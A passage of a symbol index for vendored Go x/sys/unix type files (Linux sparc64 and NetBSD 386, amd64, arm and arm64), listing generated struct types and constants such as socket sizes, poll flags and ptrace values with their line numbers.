SysvShmDesc (line 703) | type SysvShmDesc struct FILE: vendor/golang.org/x/sys/unix/ztypes_linux_sparc64.go constant SizeofPtr (line 9) | SizeofPtr = 0x8 constant SizeofLong (line 10) | SizeofLong = 0x8 type _C_long (line 14) | type _C_long type Timespec (line 17) | type Timespec struct type Timeval (line 22) | type Timeval struct type Timex (line 28) | type Timex struct type Time_t (line 52) | type Time_t type Tms (line 54) | type Tms struct type Utimbuf (line 61) | type Utimbuf struct type Rusage (line 66) | type Rusage struct type Stat_t (line 85) | type Stat_t struct type Dirent (line 105) | type Dirent struct type Flock_t (line 114) | type Flock_t struct type DmNameList (line 124) | type DmNameList struct constant FADV_DONTNEED (line 132) | FADV_DONTNEED = 0x4 constant FADV_NOREUSE (line 133) | FADV_NOREUSE = 0x5 type RawSockaddrNFCLLCP (line 136) | type RawSockaddrNFCLLCP struct type RawSockaddr (line 147) | type RawSockaddr struct type RawSockaddrAny (line 152) | type RawSockaddrAny struct type Iovec (line 157) | type Iovec struct type Msghdr (line 162) | type Msghdr struct type Cmsghdr (line 173) | type Cmsghdr struct type ifreq (line 179) | type ifreq struct constant SizeofSockaddrNFCLLCP (line 185) | SizeofSockaddrNFCLLCP = 0x60 constant SizeofIovec (line 186) | SizeofIovec = 0x10 constant SizeofMsghdr (line 187) | SizeofMsghdr = 0x38 constant SizeofCmsghdr (line 188) | SizeofCmsghdr = 0x10 constant SizeofSockFprog (line 192) | SizeofSockFprog = 0x10 type PtraceRegs (line 195) | type PtraceRegs struct type FdSet (line 204) | type FdSet struct type Sysinfo_t (line 208) | type Sysinfo_t struct type Ustat_t (line 226) | type Ustat_t struct type EpollEvent (line 234) | type EpollEvent struct constant OPEN_TREE_CLOEXEC (line 242) | OPEN_TREE_CLOEXEC = 0x400000 constant POLLRDHUP (line 246) | POLLRDHUP = 0x800 type Sigset_t (line 249) | type Sigset_t struct constant _C__NSIG (line 253) | _C__NSIG = 0x41 constant SIG_BLOCK (line 256) | SIG_BLOCK = 0x1 constant SIG_UNBLOCK (line 257) | SIG_UNBLOCK = 0x2 constant SIG_SETMASK (line 258) | SIG_SETMASK = 0x4 type Siginfo (line 261) | type Siginfo struct type Termios (line 269) | type Termios struct type Taskstats (line 280) | type Taskstats struct type cpuMask (line 340) | type cpuMask constant _NCPUBITS (line 343) | _NCPUBITS = 0x40 constant CBitFieldMaskBit0 (line 347) | CBitFieldMaskBit0 = 0x8000000000000000 constant CBitFieldMaskBit1 (line 348) | CBitFieldMaskBit1 = 0x4000000000000000 constant CBitFieldMaskBit2 (line 349) | CBitFieldMaskBit2 = 0x2000000000000000 constant CBitFieldMaskBit3 (line 350) | CBitFieldMaskBit3 = 0x1000000000000000 constant CBitFieldMaskBit4 (line 351) | CBitFieldMaskBit4 = 0x800000000000000 constant CBitFieldMaskBit5 (line 352) | CBitFieldMaskBit5 = 0x400000000000000 constant CBitFieldMaskBit6 (line 353) | CBitFieldMaskBit6 = 0x200000000000000 constant CBitFieldMaskBit7 (line 354) | CBitFieldMaskBit7 = 0x100000000000000 constant CBitFieldMaskBit8 (line 355) | CBitFieldMaskBit8 = 0x80000000000000 constant CBitFieldMaskBit9 (line 356) | CBitFieldMaskBit9 = 0x40000000000000 constant CBitFieldMaskBit10 (line 357) | CBitFieldMaskBit10 = 0x20000000000000 constant CBitFieldMaskBit11 (line 358) | CBitFieldMaskBit11 = 0x10000000000000 constant CBitFieldMaskBit12 (line 359) | CBitFieldMaskBit12 = 0x8000000000000 constant CBitFieldMaskBit13 (line 360) | CBitFieldMaskBit13 = 0x4000000000000 constant CBitFieldMaskBit14 (line 361) | CBitFieldMaskBit14 = 0x2000000000000 constant CBitFieldMaskBit15 (line 362) | CBitFieldMaskBit15 = 0x1000000000000 constant CBitFieldMaskBit16 (line 363) | CBitFieldMaskBit16 = 0x800000000000 constant CBitFieldMaskBit17 (line 364) | CBitFieldMaskBit17 = 0x400000000000 constant CBitFieldMaskBit18 (line 365) | CBitFieldMaskBit18 = 0x200000000000 constant CBitFieldMaskBit19 (line 366) | CBitFieldMaskBit19 = 0x100000000000 constant CBitFieldMaskBit20 (line 367) | CBitFieldMaskBit20 = 0x80000000000 constant CBitFieldMaskBit21 (line 368) | CBitFieldMaskBit21 = 0x40000000000 constant CBitFieldMaskBit22 (line 369) | CBitFieldMaskBit22 = 0x20000000000 constant CBitFieldMaskBit23 (line 370) | CBitFieldMaskBit23 = 0x10000000000 constant CBitFieldMaskBit24 (line 371) | CBitFieldMaskBit24 = 0x8000000000 constant CBitFieldMaskBit25 (line 372) | CBitFieldMaskBit25 = 0x4000000000 constant CBitFieldMaskBit26 (line 373) | CBitFieldMaskBit26 = 0x2000000000 constant CBitFieldMaskBit27 (line 374) | CBitFieldMaskBit27 = 0x1000000000 constant CBitFieldMaskBit28 (line 375) | CBitFieldMaskBit28 = 0x800000000 constant CBitFieldMaskBit29 (line 376) | CBitFieldMaskBit29 = 0x400000000 constant CBitFieldMaskBit30 (line 377) | CBitFieldMaskBit30 = 0x200000000 constant CBitFieldMaskBit31 (line 378) | CBitFieldMaskBit31 = 0x100000000 constant CBitFieldMaskBit32 (line 379) | CBitFieldMaskBit32 = 0x80000000 constant CBitFieldMaskBit33 (line 380) | CBitFieldMaskBit33 = 0x40000000 constant CBitFieldMaskBit34 (line 381) | CBitFieldMaskBit34 = 0x20000000 constant CBitFieldMaskBit35 (line 382) | CBitFieldMaskBit35 = 0x10000000 constant CBitFieldMaskBit36 (line 383) | CBitFieldMaskBit36 = 0x8000000 constant CBitFieldMaskBit37 (line 384) | CBitFieldMaskBit37 = 0x4000000 constant CBitFieldMaskBit38 (line 385) | CBitFieldMaskBit38 = 0x2000000 constant CBitFieldMaskBit39 (line 386) | CBitFieldMaskBit39 = 0x1000000 constant CBitFieldMaskBit40 (line 387) | CBitFieldMaskBit40 = 0x800000 constant CBitFieldMaskBit41 (line 388) | CBitFieldMaskBit41 = 0x400000 constant CBitFieldMaskBit42 (line 389) | CBitFieldMaskBit42 = 0x200000 constant CBitFieldMaskBit43 (line 390) | CBitFieldMaskBit43 = 0x100000 constant CBitFieldMaskBit44 (line 391) | CBitFieldMaskBit44 = 0x80000 constant CBitFieldMaskBit45 (line 392) | CBitFieldMaskBit45 = 0x40000 constant CBitFieldMaskBit46 (line 393) | CBitFieldMaskBit46 = 0x20000 constant CBitFieldMaskBit47 (line 394) | CBitFieldMaskBit47 = 0x10000 constant CBitFieldMaskBit48 (line 395) | CBitFieldMaskBit48 = 0x8000 constant CBitFieldMaskBit49 (line 396) | CBitFieldMaskBit49 = 0x4000 constant CBitFieldMaskBit50 (line 397) | CBitFieldMaskBit50 = 0x2000 constant CBitFieldMaskBit51 (line 398) | CBitFieldMaskBit51 = 0x1000 constant CBitFieldMaskBit52 (line 399) | CBitFieldMaskBit52 = 0x800 constant CBitFieldMaskBit53 (line 400) | CBitFieldMaskBit53 = 0x400 constant CBitFieldMaskBit54 (line 401) | CBitFieldMaskBit54 = 0x200 constant CBitFieldMaskBit55 (line 402) | CBitFieldMaskBit55 = 0x100 constant CBitFieldMaskBit56 (line 403) | CBitFieldMaskBit56 = 0x80 constant CBitFieldMaskBit57 (line 404) | CBitFieldMaskBit57 = 0x40 constant CBitFieldMaskBit58 (line 405) | CBitFieldMaskBit58 = 0x20 constant CBitFieldMaskBit59 (line 406) | CBitFieldMaskBit59 = 0x10 constant CBitFieldMaskBit60 (line 407) | CBitFieldMaskBit60 = 0x8 constant CBitFieldMaskBit61 (line 408) | CBitFieldMaskBit61 = 0x4 constant CBitFieldMaskBit62 (line 409) | CBitFieldMaskBit62 = 0x2 constant CBitFieldMaskBit63 (line 410) | CBitFieldMaskBit63 = 0x1 type SockaddrStorage (line 413) | type SockaddrStorage struct type HDGeometry (line 419) | type HDGeometry struct type Statfs_t (line 426) | type Statfs_t struct type TpacketHdr (line 441) | type TpacketHdr struct constant SizeofTpacketHdr (line 453) | SizeofTpacketHdr = 0x20 type RTCPLLInfo (line 456) | type RTCPLLInfo struct type BlkpgPartition (line 466) | type BlkpgPartition struct constant BLKPG (line 476) | BLKPG = 0x20001269 type XDPUmemReg (line 479) | type XDPUmemReg struct type CryptoUserAlg (line 488) | type CryptoUserAlg struct type CryptoStatAEAD (line 498) | type CryptoStatAEAD struct type CryptoStatAKCipher (line 507) | type CryptoStatAKCipher struct type CryptoStatCipher (line 518) | type CryptoStatCipher struct type CryptoStatCompress (line 527) | type CryptoStatCompress struct type CryptoStatHash (line 536) | type CryptoStatHash struct type CryptoStatKPP (line 543) | type CryptoStatKPP struct type CryptoStatRNG (line 551) | type CryptoStatRNG struct type CryptoStatLarval (line 559) | type CryptoStatLarval struct type CryptoReportLarval (line 563) | type CryptoReportLarval struct type CryptoReportHash (line 567) | type CryptoReportHash struct type CryptoReportCipher (line 573) | type CryptoReportCipher struct type CryptoReportBlkCipher (line 580) | type CryptoReportBlkCipher struct type CryptoReportAEAD (line 589) | type CryptoReportAEAD struct type CryptoReportComp (line 597) | type CryptoReportComp struct type CryptoReportRNG (line 601) | type CryptoReportRNG struct type CryptoReportAKCipher (line 606) | type CryptoReportAKCipher struct type CryptoReportKPP (line 610) | type CryptoReportKPP struct type CryptoReportAcomp (line 614) | type CryptoReportAcomp struct type LoopInfo (line 618) | type LoopInfo struct type TIPCSubscr (line 634) | type TIPCSubscr struct type TIPCSIOCLNReq (line 641) | type TIPCSIOCLNReq struct type TIPCSIOCNodeIDReq (line 647) | type TIPCSIOCNodeIDReq struct type PPSKInfo (line 652) | type PPSKInfo struct constant PPS_GETPARAMS (line 662) | PPS_GETPARAMS = 0x400870a1 constant PPS_SETPARAMS (line 663) | PPS_SETPARAMS = 0x800870a2 constant PPS_GETCAP (line 664) | PPS_GETCAP = 0x400870a3 constant PPS_FETCH (line 665) | PPS_FETCH = 0xc00870a4 constant PIDFD_NONBLOCK (line 669) | PIDFD_NONBLOCK = 0x4000 type SysvIpcPerm (line 672) | type SysvIpcPerm struct type SysvShmDesc (line 684) | type SysvShmDesc struct FILE: vendor/golang.org/x/sys/unix/ztypes_netbsd_386.go constant SizeofPtr (line 9) | SizeofPtr = 0x4 constant SizeofShort (line 10) | SizeofShort = 0x2 constant SizeofInt (line 11) | SizeofInt = 0x4 constant SizeofLong (line 12) | SizeofLong = 0x4 constant SizeofLongLong (line 13) | SizeofLongLong = 0x8 type _C_short (line 17) | type _C_short type _C_int (line 18) | type _C_int type _C_long (line 19) | type _C_long type _C_long_long (line 20) | type _C_long_long type Timespec (line 23) | type Timespec struct type Timeval (line 28) | type Timeval struct type Rusage (line 33) | type Rusage struct type Rlimit (line 52) | type Rlimit struct type _Gid_t (line 57) | type _Gid_t type Stat_t (line 59) | type Stat_t struct type Statfs_t (line 79) | type Statfs_t type Statvfs_t (line 81) | type Statvfs_t struct type Flock_t (line 108) | type Flock_t struct type Dirent (line 116) | type Dirent struct type Fsid (line 125) | type Fsid struct constant PathMax (line 130) | PathMax = 0x400 constant ST_WAIT (line 134) | ST_WAIT = 0x1 constant ST_NOWAIT (line 135) | ST_NOWAIT = 0x2 constant FADV_NORMAL (line 139) | FADV_NORMAL = 0x0 constant FADV_RANDOM (line 140) | FADV_RANDOM = 0x1 constant FADV_SEQUENTIAL (line 141) | FADV_SEQUENTIAL = 0x2 constant FADV_WILLNEED (line 142) | FADV_WILLNEED = 0x3 constant FADV_DONTNEED (line 143) | FADV_DONTNEED = 0x4 constant FADV_NOREUSE (line 144) | FADV_NOREUSE = 0x5 type RawSockaddrInet4 (line 147) | type RawSockaddrInet4 struct type RawSockaddrInet6 (line 155) | type RawSockaddrInet6 struct type RawSockaddrUnix (line 164) | type RawSockaddrUnix struct type RawSockaddrDatalink (line 170) | type RawSockaddrDatalink struct type RawSockaddr (line 181) | type RawSockaddr struct type RawSockaddrAny (line 187) | type RawSockaddrAny struct type _Socklen (line 192) | type _Socklen type Linger (line 194) | type Linger struct type Iovec (line 199) | type Iovec struct type IPMreq (line 204) | type IPMreq struct type IPv6Mreq (line 209) | type IPv6Mreq struct type Msghdr (line 214) | type Msghdr struct type Cmsghdr (line 224) | type Cmsghdr struct type Inet6Pktinfo (line 230) | type Inet6Pktinfo struct type IPv6MTUInfo (line 235) | type IPv6MTUInfo struct type ICMPv6Filter (line 240) | type ICMPv6Filter struct constant SizeofSockaddrInet4 (line 245) | SizeofSockaddrInet4 = 0x10 constant SizeofSockaddrInet6 (line 246) | SizeofSockaddrInet6 = 0x1c constant SizeofSockaddrAny (line 247) | SizeofSockaddrAny = 0x6c constant SizeofSockaddrUnix (line 248) | SizeofSockaddrUnix = 0x6a constant SizeofSockaddrDatalink (line 249) | SizeofSockaddrDatalink = 0x14 constant SizeofLinger (line 250) | SizeofLinger = 0x8 constant SizeofIovec (line 251) | SizeofIovec = 0x8 constant SizeofIPMreq (line 252) | SizeofIPMreq = 0x8 constant SizeofIPv6Mreq (line 253) | SizeofIPv6Mreq = 0x14 constant SizeofMsghdr (line 254) | SizeofMsghdr = 0x1c constant SizeofCmsghdr (line 255) | SizeofCmsghdr = 0xc constant SizeofInet6Pktinfo (line 256) | SizeofInet6Pktinfo = 0x14 constant SizeofIPv6MTUInfo (line 257) | SizeofIPv6MTUInfo = 0x20 constant SizeofICMPv6Filter (line 258) | SizeofICMPv6Filter = 0x20 constant PTRACE_TRACEME (line 262) | PTRACE_TRACEME = 0x0 constant PTRACE_CONT (line 263) | PTRACE_CONT = 0x7 constant PTRACE_KILL (line 264) | PTRACE_KILL = 0x8 type Kevent_t (line 267) | type Kevent_t struct type FdSet (line 276) | type FdSet struct constant SizeofIfMsghdr (line 281) | SizeofIfMsghdr = 0x98 constant SizeofIfData (line 282) | SizeofIfData = 0x84 constant SizeofIfaMsghdr (line 283) | SizeofIfaMsghdr = 0x18 constant SizeofIfAnnounceMsghdr (line 284) | SizeofIfAnnounceMsghdr = 0x18 constant SizeofRtMsghdr (line 285) | SizeofRtMsghdr = 0x78 constant SizeofRtMetrics (line 286) | SizeofRtMetrics = 0x50 type IfMsghdr (line 289) | type IfMsghdr struct type IfData (line 301) | type IfData struct type IfaMsghdr (line 324) | type IfaMsghdr struct type IfAnnounceMsghdr (line 335) | type IfAnnounceMsghdr struct type RtMsghdr (line 344) | type RtMsghdr struct type RtMetrics (line 361) | type RtMetrics struct type Mclpool (line 374) | type Mclpool constant SizeofBpfVersion (line 377) | SizeofBpfVersion = 0x4 constant SizeofBpfStat (line 378) | SizeofBpfStat = 0x80 constant SizeofBpfProgram (line 379) | SizeofBpfProgram = 0x8 constant SizeofBpfInsn (line 380) | SizeofBpfInsn = 0x8 constant SizeofBpfHdr (line 381) | SizeofBpfHdr = 0x14 type BpfVersion (line 384) | type BpfVersion struct type BpfStat (line 389) | type BpfStat struct type BpfProgram (line 396) | type BpfProgram struct type BpfInsn (line 401) | type BpfInsn struct type BpfHdr (line 408) | type BpfHdr struct type BpfTimeval (line 416) | type BpfTimeval struct type Termios (line 421) | type Termios struct type Winsize (line 431) | type Winsize struct type Ptmget (line 438) | type Ptmget struct constant AT_FDCWD (line 446) | AT_FDCWD = -0x64 constant AT_EACCESS (line 447) | AT_EACCESS = 0x100 constant AT_SYMLINK_NOFOLLOW (line 448) | AT_SYMLINK_NOFOLLOW = 0x200 constant AT_SYMLINK_FOLLOW (line 449) | AT_SYMLINK_FOLLOW = 0x400 constant AT_REMOVEDIR (line 450) | AT_REMOVEDIR = 0x800 type PollFd (line 453) | type PollFd struct constant POLLERR (line 460) | POLLERR = 0x8 constant POLLHUP (line 461) | POLLHUP = 0x10 constant POLLIN (line 462) | POLLIN = 0x1 constant POLLNVAL (line 463) | POLLNVAL = 0x20 constant POLLOUT (line 464) | POLLOUT = 0x4 constant POLLPRI (line 465) | POLLPRI = 0x2 constant POLLRDBAND (line 466) | POLLRDBAND = 0x80 constant POLLRDNORM (line 467) | POLLRDNORM = 0x40 constant POLLWRBAND (line 468) | POLLWRBAND = 0x100 constant POLLWRNORM (line 469) | POLLWRNORM = 0x4 type Sysctlnode (line 472) | type Sysctlnode struct type Utsname (line 485) | type Utsname struct constant SizeofUvmexp (line 493) | SizeofUvmexp = 0x278 type Uvmexp (line 495) | type Uvmexp struct constant SizeofClockinfo (line 577) | SizeofClockinfo = 0x14 type Clockinfo (line 579) | type Clockinfo struct FILE: vendor/golang.org/x/sys/unix/ztypes_netbsd_amd64.go constant SizeofPtr (line 9) | SizeofPtr = 0x8 constant SizeofShort (line 10) | SizeofShort = 0x2 constant SizeofInt (line 11) | SizeofInt = 0x4 constant SizeofLong (line 12) | SizeofLong = 0x8 constant SizeofLongLong (line 13) | SizeofLongLong = 0x8 type _C_short (line 17) | type _C_short type _C_int (line 18) | type _C_int type _C_long (line 19) | type _C_long type _C_long_long (line 20) | type _C_long_long type Timespec (line 23) | type Timespec struct type Timeval (line 28) | type Timeval struct type Rusage (line 34) | type Rusage struct type Rlimit (line 53) | type Rlimit struct type _Gid_t (line 58) | type _Gid_t type Stat_t (line 60) | type Stat_t struct type Statfs_t (line 83) | type Statfs_t type Statvfs_t (line 85) | type Statvfs_t struct type Flock_t (line 113) | type Flock_t struct type Dirent (line 121) | type Dirent struct type Fsid (line 130) | type Fsid struct constant PathMax (line 135) | PathMax = 0x400 constant ST_WAIT (line 139) | ST_WAIT = 0x1 constant ST_NOWAIT (line 140) | ST_NOWAIT = 0x2 constant FADV_NORMAL (line 144) | FADV_NORMAL = 0x0 constant FADV_RANDOM (line 145) | FADV_RANDOM = 0x1 constant FADV_SEQUENTIAL (line 146) | FADV_SEQUENTIAL = 0x2 constant FADV_WILLNEED (line 147) | FADV_WILLNEED = 0x3 constant FADV_DONTNEED (line 148) | FADV_DONTNEED = 0x4 constant FADV_NOREUSE (line 149) | FADV_NOREUSE = 0x5 type RawSockaddrInet4 (line 152) | type RawSockaddrInet4 struct type RawSockaddrInet6 (line 160) | type RawSockaddrInet6 struct type RawSockaddrUnix (line 169) | type RawSockaddrUnix struct type RawSockaddrDatalink (line 175) | type RawSockaddrDatalink struct type RawSockaddr (line 186) | type RawSockaddr struct type RawSockaddrAny (line 192) | type RawSockaddrAny struct type _Socklen (line 197) | type _Socklen type Linger (line 199) | type Linger struct type Iovec (line 204) | type Iovec struct type IPMreq (line 209) | type IPMreq struct type IPv6Mreq (line 214) | type IPv6Mreq struct type Msghdr (line 219) | type Msghdr struct type Cmsghdr (line 231) | type Cmsghdr struct type Inet6Pktinfo (line 237) | type Inet6Pktinfo struct type IPv6MTUInfo (line 242) | type IPv6MTUInfo struct type ICMPv6Filter (line 247) | type ICMPv6Filter struct constant SizeofSockaddrInet4 (line 252) | SizeofSockaddrInet4 = 0x10 constant SizeofSockaddrInet6 (line 253) | SizeofSockaddrInet6 = 0x1c constant SizeofSockaddrAny (line 254) | SizeofSockaddrAny = 0x6c constant SizeofSockaddrUnix (line 255) | SizeofSockaddrUnix = 0x6a constant SizeofSockaddrDatalink (line 256) | SizeofSockaddrDatalink = 0x14 constant SizeofLinger (line 257) | SizeofLinger = 0x8 constant SizeofIovec (line 258) | SizeofIovec = 0x10 constant SizeofIPMreq (line 259) | SizeofIPMreq = 0x8 constant SizeofIPv6Mreq (line 260) | SizeofIPv6Mreq = 0x14 constant SizeofMsghdr (line 261) | SizeofMsghdr = 0x30 constant SizeofCmsghdr (line 262) | SizeofCmsghdr = 0xc constant SizeofInet6Pktinfo (line 263) | SizeofInet6Pktinfo = 0x14 constant SizeofIPv6MTUInfo (line 264) | SizeofIPv6MTUInfo = 0x20 constant SizeofICMPv6Filter (line 265) | SizeofICMPv6Filter = 0x20 constant PTRACE_TRACEME (line 269) | PTRACE_TRACEME = 0x0 constant PTRACE_CONT (line 270) | PTRACE_CONT = 0x7 constant PTRACE_KILL (line 271) | PTRACE_KILL = 0x8 type Kevent_t (line 274) | type Kevent_t struct type FdSet (line 284) | type FdSet struct constant SizeofIfMsghdr (line 289) | SizeofIfMsghdr = 0x98 constant SizeofIfData (line 290) | SizeofIfData = 0x88 constant SizeofIfaMsghdr (line 291) | SizeofIfaMsghdr = 0x18 constant SizeofIfAnnounceMsghdr (line 292) | SizeofIfAnnounceMsghdr = 0x18 constant SizeofRtMsghdr (line 293) | SizeofRtMsghdr = 0x78 constant SizeofRtMetrics (line 294) | SizeofRtMetrics = 0x50 type IfMsghdr (line 297) | type IfMsghdr struct type IfData (line 308) | type IfData struct type IfaMsghdr (line 331) | type IfaMsghdr struct type IfAnnounceMsghdr (line 342) | type IfAnnounceMsghdr struct type RtMsghdr (line 351) | type RtMsghdr struct type RtMetrics (line 368) | type RtMetrics struct type Mclpool (line 381) | type Mclpool constant SizeofBpfVersion (line 384) | SizeofBpfVersion = 0x4 constant SizeofBpfStat (line 385) | SizeofBpfStat = 0x80 constant SizeofBpfProgram (line 386) | SizeofBpfProgram = 0x10 constant SizeofBpfInsn (line 387) | SizeofBpfInsn = 0x8 constant SizeofBpfHdr (line 388) | SizeofBpfHdr = 0x20 type BpfVersion (line 391) | type BpfVersion struct type BpfStat (line 396) | type BpfStat struct type BpfProgram (line 403) | type BpfProgram struct type BpfInsn (line 409) | type BpfInsn struct type BpfHdr (line 416) | type BpfHdr struct type BpfTimeval (line 424) | type BpfTimeval struct type Termios (line 429) | type Termios struct type Winsize (line 439) | type Winsize struct type Ptmget (line 446) | type Ptmget struct constant AT_FDCWD (line 454) | AT_FDCWD = -0x64 constant AT_EACCESS (line 455) | AT_EACCESS = 0x100 constant AT_SYMLINK_NOFOLLOW (line 456) | AT_SYMLINK_NOFOLLOW = 0x200 constant AT_SYMLINK_FOLLOW (line 457) | AT_SYMLINK_FOLLOW = 0x400 constant AT_REMOVEDIR (line 458) | AT_REMOVEDIR = 0x800 type PollFd (line 461) | type PollFd struct constant POLLERR (line 468) | POLLERR = 0x8 constant POLLHUP (line 469) | POLLHUP = 0x10 constant POLLIN (line 470) | POLLIN = 0x1 constant POLLNVAL (line 471) | POLLNVAL = 0x20 constant POLLOUT (line 472) | POLLOUT = 0x4 constant POLLPRI (line 473) | POLLPRI = 0x2 constant POLLRDBAND (line 474) | POLLRDBAND = 0x80 constant POLLRDNORM (line 475) | POLLRDNORM = 0x40 constant POLLWRBAND (line 476) | POLLWRBAND = 0x100 constant POLLWRNORM (line 477) | POLLWRNORM = 0x4 type Sysctlnode (line 480) | type Sysctlnode struct type Utsname (line 493) | type Utsname struct constant SizeofUvmexp (line 501) | SizeofUvmexp = 0x278 type Uvmexp (line 503) | type Uvmexp struct constant SizeofClockinfo (line 585) | SizeofClockinfo = 0x14 type Clockinfo (line 587) | type Clockinfo struct FILE: vendor/golang.org/x/sys/unix/ztypes_netbsd_arm.go constant SizeofPtr (line 9) | SizeofPtr = 0x4 constant SizeofShort (line 10) | SizeofShort = 0x2 constant SizeofInt (line 11) | SizeofInt = 0x4 constant SizeofLong (line 12) | SizeofLong = 0x4 constant SizeofLongLong (line 13) | SizeofLongLong = 0x8 type _C_short (line 17) | type _C_short type _C_int (line 18) | type _C_int type _C_long (line 19) | type _C_long type _C_long_long (line 20) | type _C_long_long type Timespec (line 23) | type Timespec struct type Timeval (line 29) | type Timeval struct type Rusage (line 35) | type Rusage struct type Rlimit (line 54) | type Rlimit struct type _Gid_t (line 59) | type _Gid_t type Stat_t (line 61) | type Stat_t struct type Statfs_t (line 84) | type Statfs_t type Statvfs_t (line 86) | type Statvfs_t struct type Flock_t (line 113) | type Flock_t struct type Dirent (line 121) | type Dirent struct type Fsid (line 130) | type Fsid struct constant PathMax (line 135) | PathMax = 0x400 constant ST_WAIT (line 139) | ST_WAIT = 0x1 constant ST_NOWAIT (line 140) | ST_NOWAIT = 0x2 constant FADV_NORMAL (line 144) | FADV_NORMAL = 0x0 constant FADV_RANDOM (line 145) | FADV_RANDOM = 0x1 constant FADV_SEQUENTIAL (line 146) | FADV_SEQUENTIAL = 0x2 constant FADV_WILLNEED (line 147) | FADV_WILLNEED = 0x3 constant FADV_DONTNEED (line 148) | FADV_DONTNEED = 0x4 constant FADV_NOREUSE (line 149) | FADV_NOREUSE = 0x5 type RawSockaddrInet4 (line 152) | type RawSockaddrInet4 struct type RawSockaddrInet6 (line 160) | type RawSockaddrInet6 struct type RawSockaddrUnix (line 169) | type RawSockaddrUnix struct type RawSockaddrDatalink (line 175) | type RawSockaddrDatalink struct type RawSockaddr (line 186) | type RawSockaddr struct type RawSockaddrAny (line 192) | type RawSockaddrAny struct type _Socklen (line 197) | type _Socklen type Linger (line 199) | type Linger struct type Iovec (line 204) | type Iovec struct type IPMreq (line 209) | type IPMreq struct type IPv6Mreq (line 214) | type IPv6Mreq struct type Msghdr (line 219) | type Msghdr struct type Cmsghdr (line 229) | type Cmsghdr struct type Inet6Pktinfo (line 235) | type Inet6Pktinfo struct type IPv6MTUInfo (line 240) | type IPv6MTUInfo struct type ICMPv6Filter (line 245) | type ICMPv6Filter struct constant SizeofSockaddrInet4 (line 250) | SizeofSockaddrInet4 = 0x10 constant SizeofSockaddrInet6 (line 251) | SizeofSockaddrInet6 = 0x1c constant SizeofSockaddrAny (line 252) | SizeofSockaddrAny = 0x6c constant SizeofSockaddrUnix (line 253) | SizeofSockaddrUnix = 0x6a constant SizeofSockaddrDatalink (line 254) | SizeofSockaddrDatalink = 0x14 constant SizeofLinger (line 255) | SizeofLinger = 0x8 constant SizeofIovec (line 256) | SizeofIovec = 0x8 constant SizeofIPMreq (line 257) | SizeofIPMreq = 0x8 constant SizeofIPv6Mreq (line 258) | SizeofIPv6Mreq = 0x14 constant SizeofMsghdr (line 259) | SizeofMsghdr = 0x1c constant SizeofCmsghdr (line 260) | SizeofCmsghdr = 0xc constant SizeofInet6Pktinfo (line 261) | SizeofInet6Pktinfo = 0x14 constant SizeofIPv6MTUInfo (line 262) | SizeofIPv6MTUInfo = 0x20 constant SizeofICMPv6Filter (line 263) | SizeofICMPv6Filter = 0x20 constant PTRACE_TRACEME (line 267) | PTRACE_TRACEME = 0x0 constant PTRACE_CONT (line 268) | PTRACE_CONT = 0x7 constant PTRACE_KILL (line 269) | PTRACE_KILL = 0x8 type Kevent_t (line 272) | type Kevent_t struct type FdSet (line 282) | type FdSet struct constant SizeofIfMsghdr (line 287) | SizeofIfMsghdr = 0x98 constant SizeofIfData (line 288) | SizeofIfData = 0x88 constant SizeofIfaMsghdr (line 289) | SizeofIfaMsghdr = 0x18 constant SizeofIfAnnounceMsghdr (line 290) | SizeofIfAnnounceMsghdr = 0x18 constant SizeofRtMsghdr (line 291) | SizeofRtMsghdr = 0x78 constant SizeofRtMetrics (line 292) | SizeofRtMetrics = 0x50 type IfMsghdr (line 295) | type IfMsghdr struct type IfData (line 306) | type IfData struct type IfaMsghdr (line 329) | type IfaMsghdr struct type IfAnnounceMsghdr (line 340) | type IfAnnounceMsghdr struct type RtMsghdr (line 349) | type RtMsghdr struct type RtMetrics (line 366) | type RtMetrics struct type Mclpool (line 379) | type Mclpool constant SizeofBpfVersion (line 382) | SizeofBpfVersion = 0x4 constant SizeofBpfStat (line 383) | SizeofBpfStat = 0x80 constant SizeofBpfProgram (line 384) | SizeofBpfProgram = 0x8 constant SizeofBpfInsn (line 385) | SizeofBpfInsn = 0x8 constant SizeofBpfHdr (line 386) | SizeofBpfHdr = 0x14 type BpfVersion (line 389) | type BpfVersion struct type BpfStat (line 394) | type BpfStat struct type BpfProgram (line 401) | type BpfProgram struct type BpfInsn (line 406) | type BpfInsn struct type BpfHdr (line 413) | type BpfHdr struct type BpfTimeval (line 421) | type BpfTimeval struct type Termios (line 426) | type Termios struct type Winsize (line 436) | type Winsize struct type Ptmget (line 443) | type Ptmget struct constant AT_FDCWD (line 451) | AT_FDCWD = -0x64 constant AT_EACCESS (line 452) | AT_EACCESS = 0x100 constant AT_SYMLINK_NOFOLLOW (line 453) | AT_SYMLINK_NOFOLLOW = 0x200 constant AT_SYMLINK_FOLLOW (line 454) | AT_SYMLINK_FOLLOW = 0x400 constant AT_REMOVEDIR (line 455) | AT_REMOVEDIR = 0x800 type PollFd (line 458) | type PollFd struct constant POLLERR (line 465) | POLLERR = 0x8 constant POLLHUP (line 466) | POLLHUP = 0x10 constant POLLIN (line 467) | POLLIN = 0x1 constant POLLNVAL (line 468) | POLLNVAL = 0x20 constant POLLOUT (line 469) | POLLOUT = 0x4 constant POLLPRI (line 470) | POLLPRI = 0x2 constant POLLRDBAND (line 471) | POLLRDBAND = 0x80 constant POLLRDNORM (line 472) | POLLRDNORM = 0x40 constant POLLWRBAND (line 473) | POLLWRBAND = 0x100 constant POLLWRNORM (line 474) | POLLWRNORM = 0x4 type Sysctlnode (line 477) | type Sysctlnode struct type Utsname (line 490) | type Utsname struct constant SizeofUvmexp (line 498) | SizeofUvmexp = 0x278 type Uvmexp (line 500) | type Uvmexp struct constant SizeofClockinfo (line 582) | SizeofClockinfo = 0x14 type Clockinfo (line 584) | type Clockinfo struct FILE: vendor/golang.org/x/sys/unix/ztypes_netbsd_arm64.go constant SizeofPtr (line 9) | SizeofPtr = 0x8 constant SizeofShort (line 10) | SizeofShort = 0x2 constant SizeofInt (line 11) | SizeofInt = 0x4 constant SizeofLong (line 12) | SizeofLong = 0x8 constant SizeofLongLong (line 13) | SizeofLongLong = 0x8 type _C_short (line 17) | type _C_short type _C_int (line 18) | type _C_int type _C_long (line 19) | type _C_long type _C_long_long (line 20) | type _C_long_long type Timespec (line 23) | type Timespec struct type Timeval (line 28) | type Timeval struct type Rusage (line 34) | type Rusage struct type Rlimit (line 53) | type Rlimit struct type _Gid_t (line 58) | type _Gid_t type Stat_t (line 60) | type Stat_t struct type Statfs_t (line 83) | type Statfs_t type Statvfs_t (line 85) | type Statvfs_t struct type Flock_t (line 113) | type Flock_t struct type Dirent (line 121) | type Dirent struct type Fsid (line 130) | type Fsid 